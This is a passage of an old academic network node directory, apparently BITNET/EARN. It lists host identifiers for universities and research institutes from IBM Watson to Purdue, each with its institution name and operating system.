+YKTVMT    IBM Watson Sci Res Ctr                    VM/SP
+YKTVMH    IBM Watson Sci Res Ctr                    VM/SP
+YKTVMX    IBM Watson Sci Res Ctr                    VM/SP
+YKTVMZ    IBM Watson Sci Res Ctr                    VM/SP
+TJWATSON  IBM Watson Sci Res Ctr                    VM/SP
+YKTVMH2   IBM Watson Sci Res Ctr Yorktwn            VM/SP
+DHDIBM1   IBM Wissenschaftliches Zentrum            VM/SP
+DHDIBM1W  IBM WZH & ENC Heidelberg                  VM/SP
+FRIBCP51  IBMC, Strasbourg, France                  DEC VMS
+DKIBT     IBT                                       IBM VM/IS VER 1 5
+SELIUI51  IDA Linkoping, Sweden                     DEC VMS
+SELIUIDA  IDA Linkoping, Sweden                     DEC VMS
+BBRIBM11  IEC, La Hulpe, Belgium                    VM/SP HPO R4 2
+AWIIEZ11  IEZ Numerischer Rechner, Wien             IBM VM/SP R4
+DHVIFW1   IFW, Univ Hannover, Germany               IBM VM/SP R5
+IITVAX    Illinois Inst Tech/ACC                    VMS
+FRINA11   INA-PG                                    IBM VM/IS
+INDST     Indiana State Univ                        VM/SP
+IUBACS    Indiana U Bloomington ACS                 VMS
+IUP       Indiana U of Penn                         HONEYWELL CP-6 C00
+IUBVM     Indiana Univ Bloomington VM               VM/XA SF RELEASE 2
+IUCF      Indiana Univ Cyclotron Facil              VMS
+IUBUS     Indiana Univ Sch of Business              VM/SP
+INSTEPS   Indiana Univ Stwde Teah Elec Prod Sys     VM/SP
+INDYVAX   Indiana/Purdue U                          VMS
+INDYCMS   Indiana/Purdue U                          VM/SP
+INDYMED   Indiana/Purdue U                          VM/SP
+IUIS      Indiana/Purdue U                          MVS/XA
+FRINED51  INED                                      DEC VMS
+IRMEMU    INFN - EMU, Roma, Italy                   IBM VM/SP R4
+IPIVAXIN  INFN - Pisa                               DEC VMS
+IPIINFN   INFN Pisa                                 IBM VM/SP R4
+IRMLNF    INFN/LNF                                  DEC VMS 4 4
+ITIVAX    Information Technology Inst               VMS
+ILNPL     INPL, Israel                              DEC VMS
+FRINRA11  INRA - CTIG                               IBM VM/SP R4
+FRINRA72  INRA - CTIS                               BULL MULTICS
+FRIRTS71  INRETS                                    BULL MULTICS
+FREIBA51  INSEAD                                    DEC VMS
+FRCCRM51  INSERM, Villejuif, France                 DEC VMS
+FRIAP51   Inst d'Astrophysique Paris                VMS
+PTIFM     Inst de Fisica e Matematica               DEC VMS
+IMISIAM   Inst Fisica Cosmica Milano                VM/SP
+IASSNS    Inst for Advan Study                      VMS
+IASSUN    Inst for Advan Study                      UNIX BSD
+DBNMEB1   Inst fuer Med Statistik / Med EinrichtungeIBM VM/SP R5
+AWIIMC11  Inst Med Computwiss Uni Wien              IBM VM/SP HPO R4 2
+IRMISS    Instit Superiore di Sanita                VM/SP
+EBRIEC01  Institut d'Estudis Catalans               38 CPF
+DHDIHEP1  Institut fuer Hochenergiephysi            IBM VM/SP R4
+FRILL51   Institut Laue-Langevin                    VMS
+FRPSTR01  Institut Pasteur                          AOS/VS
+FRINT51   INT                                       VMS
+FRCPN11   IN2P3 Ctr de Calcul                       VM/SP
+IONAACAD  Iona College Comp Ctr                     VM/SP
+IONA      Iona College Music Sys                    VM/SP
+ALISUVAX  Iowa S U Ames Lab Dept Energy             VMS
+ISUMVS    Iowa State U Comp Ctr                     MVS/SP
+ISUCARD   Iowa State U Ctr. Agricul. & Rural Dev    VM/SP
+ISUEVAX   Iowa State U Eng. VAX Cluster             VMS
+ISUVAX    Iowa State VAX Cluster                    VMS
+DMZNAT51  IPH KCH KPH Uni Mainz, Germany            DEC VMS 4 6
+DGAIPP5N  IPP (MPI f. Plasmaphysik)                 VMS
+IRIS      IRIS                                      UNIX
+IRUCCVAX  IRUCCVAX                                  VMS
+FRISIO11  ISIO - MIAGE                              VM/IS
+IRMISRDS  ISRDS CNR Roma, Italy                     IBM VM/SP R5
+TRIUVM11  Istanbul Univ                             IBM VM/SP R3
+ITHACA    Ithaca College                            VMS
+ICUNIX    Ithaca College                            ULTRIX
+FRIUTO11  IUT Orsay                                 IBM VM
+JAXLAB    Jackson Lab                               UNIX BSD
+JMUVAX1   James Madison Univ VAX1                   VMS
+JPNJAERI  Japan Atomic Energy Res Inst              VM/SP
+JCSVAX1   Jersey City St Co                         VMS
+ILJCT     Jerusalem Col Tech                        DEC VMS
+JHUNIX    JHU HCF                                   UNIX
+JHUVM     JHU HCF                                   VM/SP
+JHUVMS    JHU HCF                                   VMS
+JHHMVS    JHU HCF                                   MVS/XA
+JHHVM     JHU Hosp Info Sys Dept                    VM/SP
+JHUHYG2   JHU School of Public Health               ULTRIX
+JNETDEMO  JNETDEMO, RAI, Netherlands                VMS 4 6
+ALIJKU21  Johannes Kepler U Linz                    IBM MVS/SP 1 3.8
+JCUVAX    John Carroll Univ                         VMS
+JCVAXA    John Carroll Univ                         VMS
+JVNCC     John Von Neumann Ctr                      VMS
+JVNCD     John Von Neumann Ctr                      VMS
+JVNC      John Von Neumann Ctr                      VMS
+JHUHYG    Johns Hopkins U                           VM/SP
+JHUP      Johns Hopkins U High En Phys              VMS
+JHUIGF    Johns Hopkins Univ - IGF                  VMS
+APLVM     Johns Hopkins Univ App Phys Lab           VM/SP
+JILA      Joint Inst for Lab Astrophysics           VMS
+FINJYU    Jyvaskyla Univ , Finland                  DEC VMS 4 4
+JPNKIT    Kanazawa Inst. of Tech.                   VM/SP
+KSUVAX1   Kansas St U Comp Sci Dept                 UNIX BSD
+KSUVM     Kansas State U CC                         VM/SP
+HRDKSW5   Kapteijn Sterrenwacht Roden               VMS 4 3
+BLEKUL11  Kath U Leuven                             VM/SP R4
+BLEKUL60  Kath Univ Leuven                          UNIX
+BLEKUL21  Kath. Univ Leuven, Belgium                MVS/XA 2 2.0
+BLEKUL12  Kath. Univ Leuven, Belgium                VM/SP R4
+BLEKUL10  Katholieke U Leuven Mech Eng              VM/SP R3 1
+HNYKUN55  Katholieke U Nijmegen                     VMS
+HEARN     Katholieke U Nijmegen                     VM/SP R5
+HNYKUN11  Katholieke U Nijmegen                     VM/SP HPO 4 2
+HNYKUN22  Katholieke U Nijmegen                     MVS/SP 1 3 -TSO/E-
+HNYKUN51  Katholieke U Nijmegen                     VMS
+HNYKUN53  Katholieke U Nijmegen                     VMS 4 1
+HTIKUB5   Katholieke Uni Brabant                    VMS 4
+HNYKUN52  Katholieke Universiteit Nijmegen          VMS
+JPNKEIO   Keio Univ                                 OS IV/F4 MSP
+JPNKEKVX  KEK Network                               VMS
+JPNKEKTR  KEK TRISTAN                               OS IV/F4 MSP
+KENTASHT  Kent S U Ashtabula                        VMS
+KENTELIV  Kent S U East Liverpool                   VMS
+KENTGEAU  Kent S U Geauga                           VMS
+KENTVM    Kent S U Info Services                    VM/SP
+KENTVMS   Kent S U Info Services                    VMS
+KENTGOLD  Kent S U Info Services                    VMS
+KENTSALM  Kent S U Salem                            VMS
+KENTSTAR  Kent S U Stark                            VMS
+KENTTRUM  Kent S U Trumbull                         VMS
+KENTTUSC  Kent S U Tuscarawas Cmpus                 VMS
+DJUKFA11  Kernforsch Juelich                        IBM VM/SP HPO R4 2
+DJUKFA21  Kernforsch Juelich                        IBM MVS/XA
+DKAKFK3   Kernforsch Karlsruhe                      MVS/SP
+DJUKFA53  Kernforschungsanlage Juelich G            VMS
+HGRRUG51  Kernfysisch Versn Inst                    VMS 4 2
+DJUKFA54  KFA Juelich - IFF                         VMS
+DJUKFA52  KFA Juelich - IPP                         VMS
+DKAKFK11  KFK Karlsruhe                             IBM VM/SP
+DB0ZIB21  Konrad Zuse Zentrum Infor                 IBM MVS/SP 1 3.4
+JPNKEKVM  Kou Enerugi Ken, Tsukuba Japan            VM/SP
+SEKTH     KTH                                       UNIX BSD4 3
+BLEKUL13  KUL CME                                   VM/SP R3
+JPNKUHEL  Kyoto U HEPL                              OS IV/F4 MSP
+JPNKUDPC  Kyoto Univ                                OS IV.F4 MSP
+JPNKYOTO  Kyoto Univ Dept Info Sci                  VM/SP
+JPNKISCT  Kyushu Institute of Tech                  VM/HPO
+JPNKISCI  Kyushu Institute of Tech - Iizuka         VM/HPO
+JPNCCKU   Kyushu Univ                               OSR/F4 MSP
+FRSOL11   L.P.S.O., Orsay, France                   IBM VM/SP
+FRLAAS61  LAAS Toulouse France                      UNIX
+LNCC      Lab Nat'l Comp Cientificia                VM/SP
+FRUPS51   Lab physique des solides                  VAX VMS
+FRPOLY52  Labo Physique Nucl Haute Eng              VMS
+LAFAYETT  Lafayette College                         UNIX
+LAKEHEAD  Lakehead U                                UNIX
+LUSUN     Lakehead U                                SUN UNIX
+LUVMS     Lakehead U                                MICROVMS 4 5
+FRLAL51   LAL, Orsay, France                        DEC VMS 4 5
+HWALHW5   Landbouwhogeschool Wageningen             VMS 4 3
+HWALHW50  Landbouwuniv Wageningen                   VMS 4 3
+FRLAPP51  LAPP, Annecy, France                      DEC VMS
+FRLASM51  LAS Marseille France                      DEC VMS
+FRLASH51  LASH-ENTPE                                DEC VMS
+LAUVAX01  Laurentian University                     VMS
+LAUCOSC   Laurentian University                     VMS
+LAUADMIN  Laurentian University                     VMS
+LAVALVM1  Laval U                                   VM/SP
+LAWRENCE  Lawrence Univ                             VMS
+SELDC51   LDC Lund, Sweden                          DEC VMS
+SELDC52   LDC Lund, Sweden                          DEC VMS
+LEMOYNE   Le Moyne College                          VMS
+LEHICDC1  Lehigh Univ CC - Cyber 850                NOS
+LEHICIM1  Lehigh Univ CIM Lab VM1                   VM/SP
+LEHIIBM1  Lehigh Univ Comp Ctr - IBM4381            VM/SP
+LEHIGH    Lehigh Univ Comp Ctr - Ntwk Server        MUSIC/SP
+LCVAX     Lehman Col Acad Comp Ctr                  VMS
+DM0LRZ01  Leibniz Rechenzentrum Muenchen            CDC NOS 2 5
+LCLARK    Lewis & Clark College                     BERKELEY UNIX 4.3
+SELIUC51  LIDAC Linkoping, Sweden                   DEC VMS
+DHHLILOG  LILOG-R, Uni Hamburg, Germany             IBM VM/SP R4
+FRLIM51   LIMSI-CNRS, Orsay, France                 DEC VMS
+FRLMCP61  LMCP                                      SUNOS 3 4
+FRFLU51   LMFA                                      DEC VMS
+LIUVAX    Long Island Univ                          VMS
+LAMPF     Los Alamos Nat'l Lab                      VMS
+LSUENG    Louisiana St U Coll Eng                   NOS
+LSUMVS    Louisiana St U Comp Ctr                   MVS/SP
+LSUVM     Louisiana St U Comp Ctr                   VM/SP
+LSUVAX    Louisiana St U Comp Ctr                   VMS
+LSUCHE    Louisiana State Univ Chem Eng VM          VM/SP
+LOYVAX    Loyola College, MD                        VMS
+LUCCPUA   Loyola U of Chicago                       MVS/SP
+FRLRI61   LRI-Orsay                                 SUN OS 3 4
+NNOMED    LSU Med Ctr - New Orleans                 MVS/XA
+NSHMED    LSU Med Ctr - Shreveport                  MVS/XA
+BDILUC11  LUC, Diepenbeek                           VM/SP
+IRMLUISS  LUISS Roma                                IBM VM/SP R3 1
+FRLURE51  LURE                                      VMS
+LBL       Lwrce Berkly Lab Comp Serv                VMS
+LEPICS    L3, CERN, Geneva, Switzerland             IBM VM/SP HPO 4 2
+FRMNHN11  M.N.H.M                                   IBM VM-IS
+MACALSTR  Macalester College                        VMS
+MCCVM1    Macomb Comm Co                            VM/SP
+FARMNTON  Maine - Farmington Comp Ctr               VM/SP
+MANVAX    Manhattan Coll                            VMS
+MARICOPA  Maricopa Cty Comm Coll Dist               VMS
+MARIST    Marist Col                                VM/SP
+MARISTC   Marist Col                                MUSIC
+MARISTA   Marist Col                                MUSIC
+MARISTB   Marist Col                                MUSIC
+MARFSHVM  Marist Col                                VM/SP
+MARISTF   Marist Col                                MUSIC
+MARMVS    Marist Col                                MVS/XA
+MARVMXA   Marist Col                                VM/XA/SP
+MUCSD     Marquette Univ                            VMS
+MUVMS1    Marshall U Comp Ctr                       VMS
+MITFBNML  Mass Inst of Tech FB Nat'l Magnet Lab     VMS
+MITVMA    Mass Inst of Tech Info Sys                VM/SP
+MITRLEVM  Mass Inst of Tech Res Lab Elec            VM/SP
+MITLNS    Mass Inst of Tech.                        VMS
+SLOAN     Mass Inst Tech Sloan Sch of Mgmt          VM/SP
+DK0UMI1   Mathem Institut Univ Koein                IBM VM/SP R4
+DM0MPI11  Max Planck I Physik Astrophysi            IBM VM/SP R4 1
+DGAMPE5D  Max Planck Inst Extraterr Physik          VMS
+HNYMPI51  Max Planck Inst Nijmegen                  VMS
+DM0MPF11  Max Planck Inst Psych Forsch              IBM VM/SP R3 1
+HNYMPI52  Max Planck Inst., Nijmegen, NL            VMS 4 3
+DGAIPP1S  Max-Planck-Institut fuer Plasm            IBM VM/SP R5
+MCGILLB   McGill U                                  MUSIC
+MCGILLC   McGill U                                  MUSIC
+MCGILLA   McGill U Comp Centre                      MUSIC
+MCGILL2   McGill U Comp Centre                      VM/HPO
+MCGILL1   McGill U Comp Ctr                         VM/SP
+MCGILLM   McGill U MUSIC Prod Group                 MUSIC
+MCGILL3   McGill U MUSIC Prod Group                 VM/SP
+MCGILLVS  McGill Univ CC                            MVS/SP
+MUSOCS    McGill Univ Comp Sci                      UNIX
+MCMASTER  McMaster U CIS                            VMS
+MCMVM1    McMaster U Inf Proc Svcs                  VM
+TANDEM    McMaster Univ                             VMS
+MCOIARC   Med Col Ohio Img Anal Res Ctr             VMS
+MUSC      Med U S Carolina - csx/irm                VMS
+MCO       Medical College of Ohio                   VM/SP
+MEDCOLWI  Medical College of Wisconsin              VMS
+MUN       Memorial U. of NF                         VMS
+MERIT     Merit Comp Net                            VM/SP
+MIAMIU    Miami U Academic Comp Service             VM/SP
+MIAVX2    Miami Univ Hamilton Campus VAX            VMS
+MIAVX3    Miami Univ Middletown Campus VAX          VMS
+MIAVX1    Miami Univ Oxford Campus VAX              VMS
+MSU       Mich State Univ. Computer Lab             VM/SP
+MSUEGR    Mich State Univ. Engineering              VMS
+MTUVAXC   Michigan Tech Univ Comp Sci Res VAX       UNIX
+MTUVAXB   Michigan Tech Univ Computer Sci           UNIX
+MTUVAXA   Michigan Tech Univ Ctr for Exper Comp     VMS
+MTUS5     Michigan Tech Univ Sys 5                  VM/SP/HPO
+TRMETU    Middle East Tech Uni Ankara               MCP
+MIDD      Middlebury College                        VMS
+MILLERSV  Millersville Univ of PA                   VM
+TWNMOE10  Ministry of Ed Taiwan                     VM/SP HPO
+TWNMOE20  Ministry of Ed Taiwan                     VM/SP
+MSSTATE   Mississippi State Univ CC 1100            OS1100
+MITWCCF   MIT - Whitaker College Health Sci, Tech & VMSt
+MITVMC    MIT Admin VM/CMS                          VM/SP/HPO
+MITVMD    MIT Admin VM/CMS                          VM/SP
+MITVBUD   MIT Budget, Actng, & Sponsos Programs     VMS
+MITWIBR   MIT Whitehead Instit for Biomed Res       VMS
+MITBATES  MIT Wm. Bates Linear Accel Lab            VMS
+MTSUNIX1  Montana State Univ                        ULTRIX
+TECMTYVM  Monterrey Inst of Tech                    VM/SP
+TECMTYSB  Monterrey Inst of Tech                    VM/SP
+VMTECMEX  Monterrey Instit of Tech                  VM/SP
+VMTECQRO  Monterrey Instit of Tech Queretaro        VM/SP
+MONTCOLA  Montgomery Coll                           VM/SP
+MONTCOLB  Montgomery Coll                           VM/SP
+MONTCOLC  Montgomery Coll                           MUSIC/SP/VM
+MTAM      Mount Allison U                           MUSIC
+MTA       Mount Allison U Comp Ctr                  VM/SP RELEASE 3
+DS0MPA52  MPA Stuttgart, Germany                    DEC VMS 4 7
+DM0MPB51  MPI Biochemie Muenchen                    DEC VMS 4 6
+DTUMPI51  MPI Biologie Tuebingen                    DEC VAX VMS 4 7
+DMZMPI5P  MPI Chemie                                VMS
+DHHMPI5D  MPI Fuer Meteorologie Hamburg             VMS
+DM0MPI12  MPI fuer Physik, Muenchen                 IBM VM/SP R5 0
+DM0MPI53  MPI fuer Physik, Muenchen                 DEC VMS 4 6
+DHDMPI50  MPI Kernphysik Heidelberg                 DEC VMS 4 7
+DHDMPI5   MPI Kernphysik Heidelberg                 DEC VMS 4 7
+DHDMPI5U  MPI Kernphysik Heidelberg                 DEC VMS 4 6
+DHDMPI5V  MPI Kernphysik Heidelberg                 DEC VMS 4 7
+DHDMPI5H  MPI Kernphysik Heidelberg                 DEC VMS 4 7
+DHDMPI5D  MPI Kernphysik Heidelberg                 DEC MICROVMS 4 5
+DHDMPI52  MPI Kernphysik Heidelberg                 DEC VMS 4 7
+DGAIPP5D  MPI Plasmaphysik Garching                 DEC VMS 4 5
+DS0MPI11  MPI Stuttgart, Germany                    IBM VM/SP R5
+MSUCEM    MSU Dept. Chemistry                       VMS
+MSUKBS    MSU KBS                                   VMS
+MSUNSCL   MSU NSCL                                  VMS
+MSUPA     MSU Physics Dept                          VMS
+MSVU      Mt St Vincent U                           VMS
+MSRCVAX   Mt. Sinai Sch of Med Res Comp of CUNY     VMS
+NCSUNE    N Caro S U Dept of Nucl Eng               VMS
+NIU       N Ill U                                   MVS
+NIUENG    N Ill U                                   VM/SP
+UMDNJVM1  N J Univ. Med & Dent                      VM/SP
+CANADA01  N.A.C.                                    VM/SP
+JPNNUHEP  Nagoya U HEPL                             OS IV/F4 MSP
+JPNNUCBA  Nagoya Univ of Commerce                   VM/SP
+NTIVAX    Nanyang Technological Inst                VMS
+JPNCUN10  Nanzan Univ                               VM/SP
+JPNCUN20  Nanzan Univ                               VM/SP
+NASAGISS  NASA Goddard Inst Space Stud              VM/SP
+IAFBIT    NASA GSFC Image Analysis Fac              VMS
+SCFMVS    NASA Space & Earth Sci CC                 MVS/SP
+SCFVM     NASA Space & Earth Sci CC                 VM/HPO
+VPFMVS    NASA Space & Earth Sci CC                 MVS/SP
+VPFVM     NASA Space & Earth Sci CC                 VM/SP
+AOVAX1    Nat'l A & I Ctr - Arecibo Observ          VMS
+NAS       Nat'l Acad of Sci PC/Netwrk               PC DOS
+NASVM     Nat'l Acad of Sci VM/SP                   VM/SP
+TWNCTUCS  Nat'l Chiao-Tung Univ                     VMS
+NCARIO    Nat'l Ctr for Atmosph Res                 VM/SP HPO
+NIEHS     Nat'l Instit of Environ Health Sci        VMS
+NIEHSC    Nat'l Instit of Environ Health Sci        VMS
+NIEHSD    Nat'l Instit of Environ Health Sci        VMS
+NRAO      Nat'l Radio Astronomy Observ.             VMS
+TWNCTU01  National Chia-Tung Univ                   VMS
+NIHCUDEC  National Institutes of Health (DEC-10)    TOPS-10
+NIHCU     National Institutes of Health (IBM 370)   MVS/XA
+NIHCULSU  National Institutes of Health (LSU)       VMS
+NIHCUSV1  National Institutes of Health (Server 1)  VM/SP
+NIHCUTST  National Institutes of Health (Test/Dev)  MVS/XA
+NIHDCRT   National Institutes of Health DCRT        3PLUS
+NIHKLMB   National Institutes of Health, NIDDK/LMB  VMS
+TSSNRC00  National Res Council                      TSS/370
+NRCNET    National Research Council                 VAX/VMS
+NRCCAD    National Research Council                 VAX/VMS
+MVSNRC00  National Research Council                 MVS/XA
+ICNUCEVM  National U Comp Ctr - Pisa                VM/SP
+ICNUCEVS  National U Comp Ctr - Pisa                IBM MVS
+NUSVM     National Univ of Singapore                VM HPO 4.2
+NUSEEV    National Univ of Singapore                VMS
+NUSDISCS  National Univ of Singapore                VMS
+NUS3090   National Univ of Singapore                VM HPO 4.2
+ILNCRD    Natl Cncl Res Dev MSD                     DEC VMS
+ILNITE    Natl Inst for Test and Eval               DEC VMS
+NRCVM01   Natl Res Cncl Canada Comp Ctr             VM/SP
+NAVPGS    Naval Postgrad Sch                        VM/SP
+GUNBRF    NBRF/ Georgetown Univ Med Ctr             VMS
+CMEAMRF   NBS Adv. Mfg. Res Fac.                    VMS
+NBS       NBS Consolidated Scie Comp Sys            NOS
+NBSENH    NBS Ex. Networks Host                     VMS
+NBSMICF   NBS Mgmt. Info. Comp. Fac.                VM/SP
+MSMFVM    NBS Molecular Structure Model Fac         VM
+NCSUPHYS  NC State Univ                             VMS
+NCSUMAEV  NCSI Mech & Aerospace Eng                 VMS
+NCSUMAE   NCSU  Mech & Aerospace Eng                VM/SP
+NCSUCE    NCSU Civil Eng                            VMS
+NCSUVAX   NCSU Computing Center                     VMS
+NCSUVM    NCSU Computing Center                     VM/SP4
+NCSUECE   NCSU Elec & Comp Eng                      VMS
+NCSUIE    NCSU Industrial Eng                       VMS
+NCSUMTE   NCSU Materials Eng                        VMS
+NDSUVM1   ND Higher Ed Computer Net                 VM/SP
+NDSUVAX   ND Higher Ed Computer Net                 UNIX
+NEVIS     Nevis Lab, Columbia U                     VMS
+NJECNVM   New Jersey Edu Computer Net               VM/SP
+NJECNVS   New Jersey Edu Computer Net               MVS/SP
+NJECNVM1  New Jersey Edu Computer Net               VM/SP
+NJECNVM2  New Jersey Edu Computer Net               VM/XA
+ORION     New Jersey Inst of Tech Conf Ctr          VM/SP
+MERCURY   New Jersey Inst of Tech Conf Ctr          VM/SP
+NMSUMVS1  New Mexico St U Comp Ctr                  MVS/SP
+NMSUVM1   New Mexico St U Comp Ctr                  VM/SP
+NMSU      New Mexico St U Comp Ctr                  SUNOS
+NYSPI     New York Psych Inst                       VM/SP
+NYUACF    New York U Academic Comp                  VMS
+NYUACF7   New York U Academic Comp                  VMS
+NYUACF1   New York U Academic Comp                  VMS
+NYUACF6   New York U Academic Comp                  VMS
+NYUCIMSA  New York U CIMS                           VM/SP
+NYUCCVM   New York U Comp Ctr                       VM/SP
+NYUCMCL1  New York U Courant Math & Comp. Lab       VMS
+NYUMED    New York U Med Ctr                        VMS
+DKNBI51   Niels Bohr Institute, Denmark             DEC VMS 4 6
+JPNNIHOC  Nihon U Col of Commerce                   VM/SP
+UMDNJPW1  NJ Univ Med & Dent                        VSE/SP
+UMDNJVM2  NJ Univ of Med & Dent                     VM/SP
+NOFDB     NLH-Aas, Norway                           VM/SP R5
+NCSUMEAS  North Carolina St U                       VMS
+NCSUSTAT  North Carolina St U                       VMS
+NCSUCHE   North Carolina St U Chem Engr             VMS
+NCSUMATH  North Carolina State U                    VM/SP4
+NCSUADM   North Carolina State Univ Admin Comp Ctr  MVS/SP
+NEMOVM    Northeast Missouri State Univ             VM/SP
+NEMOMUS   Northeast Missouri State Univ             VM/SP
+NUHUB     Northeastern U Comptng Res Ctr            VMS
+NEUVMS    Northeastern U Dept Physics               VMS
+NAUVM     Northern Arizona Univ                     VM/SP HPO
+NAUVAX    Northern Arizona Univ                     VMS
+NUACC     Northwestern Univ Vogelback Comp Ctr      VMS
+NUCYB     Northwestern Univ Vogelback Comp Ctr      NOS
+NRCBSP    NRC Bilogical Sciences Protein            VAX/VMS
+NRCCIT    NRC Cd
+NRCHEM    NRC Chemistry Division                    VAX/VMS
+NRCDRA    NRC Dominion Astrophysical Obs            VAX/VMS
+NRCDAO    NRC Dominion Radio Astro Obs              VAX/VMS
+NRCHEP    NRC High Energy Physics                   VAX/VMS
+NRCHYD    NRC Hydraulics Lab                        VAX/VMS
+NRCIDO    NRC Industry Development Off              VAX/VMS
+NRCPHY    NRC Physics Division                      VAX/VMS
+NSF       NSF                                       UNIX
+CRNLAES   NYSAES                                    PRIMOS
+CERAMICS  NYSC of Ceramics at Alfred Univ           VMS
+NYBVX1    NYU Graduate Business School              VMS
+FROCF51   O.P.G.C, Clermont-Ferrand, FR             DEC VMS
+ORNLSTC   Oak Ridge Nat'l Lab                       VMS
+CESARVAX  Oak Ridge Natl Lab Ctr Engg Sys Adv Res   VMS
+OCC       Oakland Comm Co                           VM
+OBERLIN   Oberlin College                           VMS
+FRONI51   Observatoire - Nice                       VMS
+FROBES51  Observatoire de Besancon, Fran            DEC VMS
+FROBOR51  Observatoire de Boreaux                   DEC VMS
+FROMRS51  Observatoire de Marseille, Fr             DEC VMS
+FRMEU51   Observatoire de Paris, Meudon             VMS
+FRNEAB51  OCDE                                      DEC VMS
+OCLCRSUN  OCLC                                      UNIX 4.2 BSD
+OHSTVMB   Ohio State U CAD/CAM                      VM/SP
+OHSTCH    Ohio State U Chem Dept VAX                VMS
+OHSTHR    Ohio State U Ctr for Human Resource Res   VMS
+OHSTMVSA  Ohio State U IRCC                         MVS/SP
+OHSTVMA   Ohio State U IRCC                         VM/SP
+OHSTPY    Ohio State U Physics Dept.                VMS
+OHSTPHRM  Ohio State Univ Coll of Pharm             VM/SP
+OUACCVMB  Ohio Univ Athens                          VM/SP
+OUACCVMA  Ohio Univ, Athens                         VM/SP
+OWUCOMCN  Ohio Wesleyan Univ                        VMS
+JPNONRI   Okazaki Nat'l Res Instit                  VMS
+OSUCC     Oklahoma State Univ CC                    MVS/XA
+UCCVMS    Oklahoma State Univ CC                    VMS
+ODUVM     Old Dominion U                            VM/SP
+UTOPVM    OPAL, CERN, Geneva,Switzerland            IBM VM/SP HPO 4 2
+HHEOUH51  Open Universiteit Heerlen                 VMS 4 4
+HHEOUH54  Open Universiteit Heerlen                 VMS 4 4
+HHEOUH53  Open Universiteit Heerlen                 VMS 4 4
+HHEOUH52  Open Universiteit Heerlen                 VMS 4 4
+DBNUOR1   Operations Research Bonn                  IBM VM/SP R4
+ORSTATE   Oregon State UCS                          NOS 2.5.1-678
+ORSTVM    Oregon State Univ.                        VM
+JPNDENTU  Osaka Electro-Comm Univ                   UNIS 4.2 BSD
+JPNOIT10  Osaka Inst of Tech                        VM/SP
+JPNOSKFM  Osaka U HEPL                              OS IV/F4 MSP
+JPNOSAKA  Osaka Univ Ed Ctr                         VM/SP
+FINOU     Oulu Univ                                 IBM VM/SP HPO R3 4
+FINOUC    Oulu University, Finland                  MICROVMS 4 6
+FRPQT51   P.Q.T., Toulouse, France                  DEC VMS
+PACEVM    Pace Univ Pleasantville-Briarcliff Camp   VM/SP
+PLU       Pacific Lutheran Univ                     VMS
+IPDUNIV   Padova U Comp Ctr                         VM/SP RELEASE 5
+PANAM2    Pan American Univ                         VMS
+PANAM1    Pan American Univ                         VMS
+PANAM     Pan American Univ                         VMS
+PSUVALM   Penn S U Comp Sci VLSI Dev                UNIX BSD
+PSUARCH   Penn St U Arch Comp Lab                   VMS
+PSUACL    Penn St U Arch Computer Lab               VMS
+PSU2020   Penn St U Engr Comp Lab                   TOPS-20
+PSUECLC   Penn St U Engr Comp Lab                   VMS
+PSUECLA   Penn St U Engr Comp Lab                   VMS
+PSUECLB   Penn St U Engr Comp Lab                   VMS
+PSUHCX    Penn St U Engr Comp Lab                   UNIX
+PSUCEMD   Penn St U Engr Comp Lab                   VMS
+PSUMEV    Penn St U Mech. Engr.                     VMS
+PSUCHEM   Penn State - Chemistry                    VM/SP
+PSUARLB   Penn State Applied Res Lab                VMS
+PSUARLC   Penn State Applied Res Lab                VMS
+PSUARLA   Penn State Applied Res Lab                VMS
+PSULEPSI  Penn State Elmnt. Particle Lab            VMS
+PSULEPSR  Penn State Elmnt. Particle Lab            VMS
+PSULEPSA  Penn State Elmnt. Particle Lab            VMS
+PSULEPSH  Penn State Elmnt. Particle Lab            VMS
+PSUECL2   Penn State Engin. Computer Lab            VM/SP
+PSUVAXG   Penn State U                              UNIX BSD
+PSUVAXS   Penn State U                              UNIX BSD
+PSUDG1    Penn State U                              AOS/VS
+PSUPENA   Penn State U Agric Ext Net                VMS
+PSUPENB   Penn State U Agric Ext Net                VMS
+PSUALT    Penn State U Altoona                      VMS
+PSUVMXA   Penn State U CAC                          VM/XA SP1
+PSUSUN01  Penn State U CAC                          SUN OS 4.0
+PSUED1    Penn State U Coll of Ed                   VMS
+PSUCES1   Penn State U Comm. Ed Sys                 VMS
+PSUCES3   Penn State U Comm. Ed Sys                 VMS
+PSUVM     Penn State U Comp Ctr                     VM/XA
+PSUCURT   Penn State U CompSci                      ACIS UNIX 4.3
+PSUDEC10  Penn State U Eng Comp Lab                 TOPS-10
+PSUNUCE   Penn State U Eng. Dept.                   VM/SP
+PSUHMC    Penn State U Hershey Med Ctr. Res. Cmptng VM/SP
+PSUHMED   Penn State U Hershey Med Ctr. Res. Cmptng VMS
+PSUMVS    Penn State University                     MVS/XA
+PSUPDP1   Penn State University                     UNIX R6
+PSUVALP   Penn SU Comp Sci VLSI Dev                 UNIX BSD
+PSUVAX1   Pennsylvania State U                      UNIX BSD
+PEPVAX    Pepperdine Univ Acad Comp VAX             ULTRIX
+PEPPCDRM  Pepperdine Univ Admin Cmptng IBM MVS      MVS/XA
+CPWPSCA   Pgh Supercomputer Ctr                     VMS
+CPWPSCB   Pgh Supercomputer Ctr                     VMS
+DMRHRZ11  Philipps-Universitaet Marburg             IBM VM/SP R4 0
+DHDPHY5   Physikalisches Institut                   VMS
+DBNPIB5   Physikalisches Institut der U Bonn        DEC VMS 4 6
+ITOPOLI   Politecnico di Torino                     VMS
+ITOPOLI3  Politecnico di Torino                     VMS
+ITOPOLI4  Politecnico di Torino                     VMS
+ITOPOLI1  Politecnico di Torino                     VMS
+ITOPOLI2  Politecnico di Torino                     VMS
+IMIPOLI   Politecnico Milano                        IBM VM/SP R4 1
+POLYTECH  Polytechnic U Comp Ctr                    VM/SP
+POLYGRAF  Polytechnic U Comp Ctr                    VM/SP
+POMONA    Pomona Col Comp Ctr                       VM/SP
+PCMATH    Pomona Col Mathematics Dept               VMS
+PSUORVM   Portland State Univ CC                    VM/SP
+PRATT     Pratt Institute Comp Ctr                  PRIMOS
+PPLCATS   Princeton Univ PLasma Phys. Lab           VM/SP
+PUCC      Princeton University                      VM/SP
+PUFORBES  Princeton University                      VM/SP
+PUNFS     Princeton University                      VM/SP
+PU1879    Princeton University                      VM/SP
+PUMIS     Princeton University                      VM/SP
+DHIAVM    PSU Dairy Herd Improv. Assn.              VM/SP
+PSULIAS   PSU Library Info Access Sys               HONEYWELL CP-6
+PSUADMIN  PSU Mgmt. Srvs                            MVS/XA
+PURCHE    Purdue U Chem Engr Dept                   VM/SP
+PURCCVM   Purdue U Comp Ctr                         VM/SP
